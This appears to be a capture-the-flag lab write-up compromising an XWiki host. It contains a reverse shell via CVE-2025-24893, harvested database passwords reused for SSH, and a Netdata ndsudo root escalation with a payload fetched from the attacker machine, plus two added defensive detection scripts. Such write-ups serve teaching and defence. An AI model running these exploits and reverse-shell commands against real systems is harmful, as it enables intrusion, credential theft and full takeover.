Proof of Concept

10.129.33.27

Nmap

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Initial Access

Performed a detailed scan of port 8080 and identified a running XWiki service

┌──(kali🎃kali)-[~/Editor]
└─$ sudo nmap 10.129.33.27 -p8080 -sCV --min-rate 3000
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-12 08:32 -0500
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 92.62% done; ETC: 08:33 (0:00:02 remaining)
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 95.97% done; ETC: 08:34 (0:00:03 remaining)
Nmap scan report for 10.nate.com (10.129.33.27)
Host is up (0.16s latency).
 
PORT     STATE SERVICE VERSION
8080/tcp open  http    Jetty 10.0.20
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Type: Jetty(10.0.20)
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Jetty(10.0.20)
| http-methods:
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.44 seconds

Found RCE vulnerability (CVE-2025-24893) and downloaded POC

┌──(kali🎃kali)-[~/Editor]
└─$ git clone https://github.com/gunzf0x/CVE-2025-24893.git
Cloning into 'CVE-2025-24893'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 1), reused 7 (delta 1), pack-reused 0 (from 0)
Receiving objects: 100% (7/7), done.
Resolving deltas: 100% (1/1), done.

Executed POC

┌──(kali🎃kali)-[~/Editor/CVE-2025-24893]
└─$ python CVE-2025-24893.py -t 'http://10.129.33.27:8080' -c 'busybox nc 10.10.14.102 4444 -e sh'
[*] Attacking http://10.129.33.27:8080
[*] Injecting the payload:
http://10.129.33.27:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2010.10.14.102%204444%20-e%20sh%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[*] Command executed
 
~Happy Hacking

Successfully obtained reverse shell connection

┌──(kali🎃kali)-[~/Editor]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.102] from (UNKNOWN) [10.129.33.27] 35376
id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
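
On the defensive side, the request the POC printed above is easy to spot in a web access log: a SolrSearch request whose text parameter decodes to wiki macro syntax. The following Python is an added example, not part of this write-up or of the POC repository; the function names, the NCSA log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Macro openers/closers that should never appear in a search term.
MACRO_RE = re.compile(r"\{\{\s*/?\s*(groovy|async|python|velocity)\b", re.I)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding for a SolrSearch request carrying macro syntax, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.rstrip("/").endswith("/Main/SolrSearch"):
        return None
    # parse_qs performs the first round of percent-decoding.
    for raw in parse_qs(url.query, keep_blank_values=True).get("text", []):
        text = fully_decode(raw)
        macros = sorted({name.lower() for name in MACRO_RE.findall(text)})
        if macros:
            return {"client": line.split(" ", 1)[0], "macros": macros, "text": text}
    return None

def scan(lines):
    """Return the findings for every suspicious line in an iterable of log lines."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (NCSA format); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jan/2026:13:30:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Jan/2026:13:32:44 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22PLACEHOLDER%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D HTTP/1.1" 200 912',
    '203.0.113.7 - - [12/Jan/2026:13:33:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=%257B%257Bgroovy%257D%257D HTTP/1.1" 200 640',
    '192.0.2.10 - - [12/Jan/2026:13:34:10 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["client"], finding["macros"], finding["text"])
```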

Lateral Movement

Enumerated /home directory and found a user “oliver”

xwiki@editor:/home$ ls
oliver

Searched the /etc/xwiki directory for the string “passw” and found two passwords:

  • theEd1t0rTeam99
  • xwikipassword2025

xwiki@editor:/etc/xwiki$ grep -r "passw" .
./hibernate.cfg.xml:    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
<SNIP>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwikipassword2025</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwiki</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwiki</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password"></property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwiki</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwiki</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password"></property>
./fonts/LICENSE-freefont:source code form), and must require no special password or key for

Successfully authenticated via SSH as user oliver with password “theEd1t0rTeam99”

┌──(kali🎃kali)-[~/Editor]
└─$ nxc ssh 10.129.33.27 -u 'oliver' -p password.txt
SSH         10.129.33.27    22     10.129.33.27     [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
SSH         10.129.33.27    22     10.129.33.27     [-] oliver:xwikipassword2025
SSH         10.129.33.27    22     10.129.33.27     [+] oliver:theEd1t0rTeam99  Linux - Shell access!

Connected to the SSH service

┌──(kali🎃kali)-[~/Editor]
└─$ ssh oliver@10.129.33.27
oliver@10.129.33.27's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
 System information as of Mon Jan 12 03:33:19 PM UTC 2026
 
  System load:  0.0               Processes:             264
  Usage of /:   65.5% of 7.28GB   Users logged in:       0
  Memory usage: 56%               IPv4 address for eth0: 10.129.33.27
  Swap usage:   0%
 
 
Expanded Security Maintenance for Applications is not enabled.
 
4 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
 
4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Mon Jan 12 15:34:18 2026 from 10.10.14.102
oliver@editor:~$

Read user.txt

oliver@editor:~$ cat user.txt
692d5b18d97dd6408f70b08dfd21bb63
oliver@editor:~$ ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:a3:cc:a2:e3  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.33.27  netmask 255.255.0.0  broadcast 10.129.255.255
        ether 00:50:56:b9:a3:9f  txqueuelen 1000  (Ethernet)
        RX packets 19566  bytes 2422473 (2.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11032  bytes 6460279 (6.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 11038  bytes 2451725 (2.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11038  bytes 2451725 (2.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Privilege Escalation

Executed linux-smart-enumeration and found services listening only on localhost

================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
udp   UNCONN 0      0               127.0.0.1:8125       0.0.0.0:*
tcp   LISTEN 0      151             127.0.0.1:3306       0.0.0.0:*
tcp   LISTEN 0      4096            127.0.0.1:8125       0.0.0.0:*
tcp   LISTEN 0      4096            127.0.0.1:19999      0.0.0.0:*
tcp   LISTEN 0      70              127.0.0.1:33060      0.0.0.0:*
tcp   LISTEN 0      4096            127.0.0.1:33281      0.0.0.0:*

Performed SSH port forwarding to access the internal services from the Kali Linux machine

┌──(kali🎃kali)-[~/Editor]
└─$ ssh -L 8125:127.0.0.1:8125 -L 3306:127.0.0.1:3306 -L 8125:127.0.0.1:8125 -L 19999:127.0.0.1:19999 -L 33060:127.0.0.1:33060 -L 33281:127.0.0.1:33281 oliver@10.129.33.27 -f -N
oliver@10.129.33.27's password:

Browsed to http://127.0.0.1:19999 and confirmed Netdata service running

Found privilege escalation vulnerability in Netdata ndsudo (CVE-2024-32019)

┌──(kali🎃kali)-[~/Editor]
└─$ git clone https://github.com/T1erno/CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC.git
Cloning into 'CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), done.

Compiled the payload on my Kali Linux machine

┌──(kali🎃kali)-[~/Editor]
└─$ cd CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC

┌──(kali🎃kali)-[~/Editor/CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC]
└─$ gcc -static payload.c -o nvme -Wall -Werror -Wpedantic

Uploaded and executed the POC to get a root shell

oliver@editor:~$ wget http://10.10.14.102:8000/CVE-2024-32019.sh
--2026-01-12 16:31:37--  http://10.10.14.102:8000/CVE-2024-32019.sh
Connecting to 10.10.14.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’
 
CVE-2024-32019.sh                    100%[=====================================================================>]     712  --.-KB/s    in 0s
 
2026-01-12 16:31:37 (55.7 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]
 
oliver@editor:~$ wget http://10.10.14.102:8000/nvme
--2026-01-12 16:31:44--  http://10.10.14.102:8000/nvme
Connecting to 10.10.14.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 825008 (806K) [application/octet-stream]
Saving to: ‘nvme’
 
nvme                                 100%[=====================================================================>] 805.67K   396KB/s    in 2.0s
 
2026-01-12 16:31:46 (396 KB/s) - ‘nvme’ saved [825008/825008]
 
oliver@editor:~$ l
CVE-2024-32019.sh  linpeas  linpeas.sh*  lse  lse.sh*  nvme  user.txt
oliver@editor:~$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@editor:/home/oliver# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)
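
The POC output above shows ndsudo being run with a modified PATH so that the uploaded nvme file is the one it executes. The following Python is an added example, not from this write-up, the POC repository or Netdata's code, showing the check a privileged helper or an auditor can apply: flag PATH entries an unprivileged user controls, and resolve helper names only against a fixed list of trusted directories. The function names and the trusted_uid parameter are assumptions for illustration.

```python
import os
import stat

def entry_problem(entry, trusted_uid=0):
    """Return why a PATH entry is unsafe for a privileged helper, or None."""
    if entry == "":
        return "empty entry (means current directory)"
    if not os.path.isabs(entry):
        return "relative path"
    try:
        st = os.stat(entry)
    except OSError:
        return "does not exist"
    if not stat.S_ISDIR(st.st_mode):
        return "not a directory"
    if st.st_uid != trusted_uid:
        return "owned by uid %d" % st.st_uid
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group- or world-writable"
    return None  # parent directories are not checked here

def audit_path(path_value, trusted_uid=0):
    """Map each unsafe entry of a PATH string to the reason it is unsafe."""
    problems = {}
    for entry in path_value.split(os.pathsep):
        reason = entry_problem(entry, trusted_uid)
        if reason:
            problems[entry] = reason
    return problems

def resolve_trusted(name, trusted_dirs, trusted_uid=0):
    """Resolve a helper name against a fixed directory list, ignoring $PATH."""
    if os.sep in name:
        return None  # bare command names only
    for d in trusted_dirs:
        if entry_problem(d, trusted_uid) is None:
            candidate = os.path.join(d, name)
            if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
                return candidate
    return None

if __name__ == "__main__":
    # Audit the caller's own PATH as a root-owned helper would have to treat it.
    for entry, reason in audit_path(os.environ.get("PATH", "")).items():
        print("%-30s %s" % (entry or "''", reason))
```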

Read root.txt

root@editor:/root# cat root.txt
4a5e14ede80d62c60d5c0c763afb156c
root@editor:/root# ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:a3:cc:a2:e3  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.33.27  netmask 255.255.0.0  broadcast 10.129.255.255
        ether 00:50:56:b9:a3:9f  txqueuelen 1000  (Ethernet)
        RX packets 39639  bytes 7534419 (7.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 22356  bytes 12472436 (12.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 19967  bytes 9212233 (9.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 19967  bytes 9212233 (9.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0